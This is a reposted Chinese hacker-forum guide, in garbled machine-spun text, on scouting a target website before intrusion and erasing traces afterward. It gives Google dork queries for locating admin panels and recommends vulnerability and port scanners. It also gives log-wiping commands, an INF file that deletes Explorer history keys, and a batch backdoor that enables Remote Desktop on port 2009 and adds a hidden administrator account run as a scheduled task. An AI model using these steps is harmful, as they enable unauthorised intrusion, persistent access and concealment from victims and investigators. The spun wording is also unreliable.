我的网站

侵犯指定网站前的踩点侦察和侵犯后的修整痕迹

2021-06-03 15:46分类:斗罗人画 阅读:

Author:zrz444 转自:3est 不息很资深在互联网上潜水,但现在击着暗基、暗白、暗吧等铜味越来越重,红鹰、暗鹰的一个一个衰退,邪凶警戒线等因循守旧,自然要现在急功近利的时代里,暗客bbs' target='_blank'>论坛到处都是,但望望都是些年少愚昧的少年拿着个工具到处横冲直撞,内心很不是滋味。    往年逛到新兴论坛的华东,意外进入了今天的3EST。开起以为也是一些愚昧少年拿着工具扫来扫往,D来D往,以是不息发了一些暗客工具,但立即被管理员MJJ指斥:情愿要技术,少发或不发工具!且每次发工具或帖子,MJJ都是第暂时间有了逆答:或删帖,或警告,自然也有添分。MJJ之详细超过吾的想象,心中终于有了一个家的感觉:自然也是真实搞技术的地方。    基于MJJ宁要技术不要工具,以是有此文章,自然行为工具流的吾,也只能发些小我粗浅的感受,不妥之处行家众指斥。 一:侵犯前的侦察。 最先掀开无界代理(最新版是U995)或VPN(保举用飞易VPN,但难免杀的,能够浅易做一下免杀)再做如下做事:   第一步:小我感觉,侦察时用来GOOGLE,用以下命令查后台和敏感新闻: site:www.****.com intext:管理|后台|登陆|用户名|暗号|验证码|体系|帐号|manage|admin|login|system site:www.*****.com inurl:login|admin|manage|manager|admin_login|login_admin|system site:www.***.com intitle:管理|后台|登陆| site:www.****.com intext:验证码 第二步:保举用TOOLS出品的wwwscan_gui.exe,扫描指定网站现在录。这个工具,能够本身DIY内里的字典文件。论坛里有MJJ的社工字典和其他人发的字典工具,都能够添进往。 第三步:用明小子,再次扫描指定网站的注入点、数据库、后台文件。并扫描有异国能够跨站。不要用现成的明小子,本身DIY数据库文件。甚至能够用X-CAN3.0对指定网站的端口如TELNET,FTP扫描。   第四步:按照以上新闻,比如,网站类型,管理员注册新闻,端口新闻。再次GOOGLE搜集网站有余众的新闻。 二:侵犯清淡步骤(无视:由于论坛MJJ们发的东西有余众也有余技术了,本人不再班门弄斧) 三:侵犯后的善后做事。    毫无疑问的是三个字:别装B! 第一:别挂暗页,那是小孩子做的事,倘若真要挂暗的话,不留下QQ号等小我新闻,小我认为这是很主要的事。 第二:修整痕迹:提出用两个工具一是AIO,小我发现,现在的肉鸡上实走命令越来越难了,这个工具实走命令也难众了,但是修整痕迹功能起终很益,很兴旺。用法: 路径Aio.exe -CleanLog   另一个工具是微柔自带的psloglist.exe,这个柔件起终不会被杀,也很益很兴旺,用法,用法能够命令走下/?一下。 第三用如着手段修整一下上网的痕迹,由于毕竟吾们意外会用肉鸡上一下网等等的。    [version] signature=$CHICAGO$ [Defaultinstall] delreg=deleteme addreg=addme [deleteme] hkcu,softwaremicrosoftinternet explorertypedurls hkcu,SoftwareMicrosoftWindowsCurrentVersionAppletsPaintrecent file list hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerfindcomputermru hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerprnportsmru hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerrecentdocs hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerrunmru hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerstreammru hkcu,SoftwareMicrosoftWindowsCurrentVersionexplorerstreams 将以上内容保存为 inf 文件 再在此文件点右键安设 即可驱逐痕迹了,INF文件放于C下,也不易发现。 第四:做下后门,毕竟象SHIFT后门容易让人发现也不兴旺,以是吾们不如直接用BAT作入体系计划义务中:代码如下: REG ADD HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f        //开启终端服务 REG ADD HKLMSYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp /v PortNumber /t REG_DWORD /d 0x7d9 /f    //改为2009连接终端 REG ADD HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp /v PortNumber /t REG_DWORD /d 0x7d9 /f    //改为2009连接终端 net user 444 000123 /add net localgroup administrators 444 /add 以上成为一个BAT文件,然后属性改为暗藏,放入体系计划中。准时运走。自然用这个之前必须望望它的AT服务开了异国,如异国用以下命令实走: sc config   Schedule start= auto     net start schedule 自然,直接进入服务改更益便当。    以上是本人对指定网站侵犯的侦察平易后常做做事,和行家交流一下,很想听听你们是怎么做的。

郑重声明:文章来源于网络,仅作为参考,如果网站中图片和文字侵犯了您的版权,请联系我们处理!

上一篇:没有了

下一篇:如何选择加盟店

相关推荐

返回顶部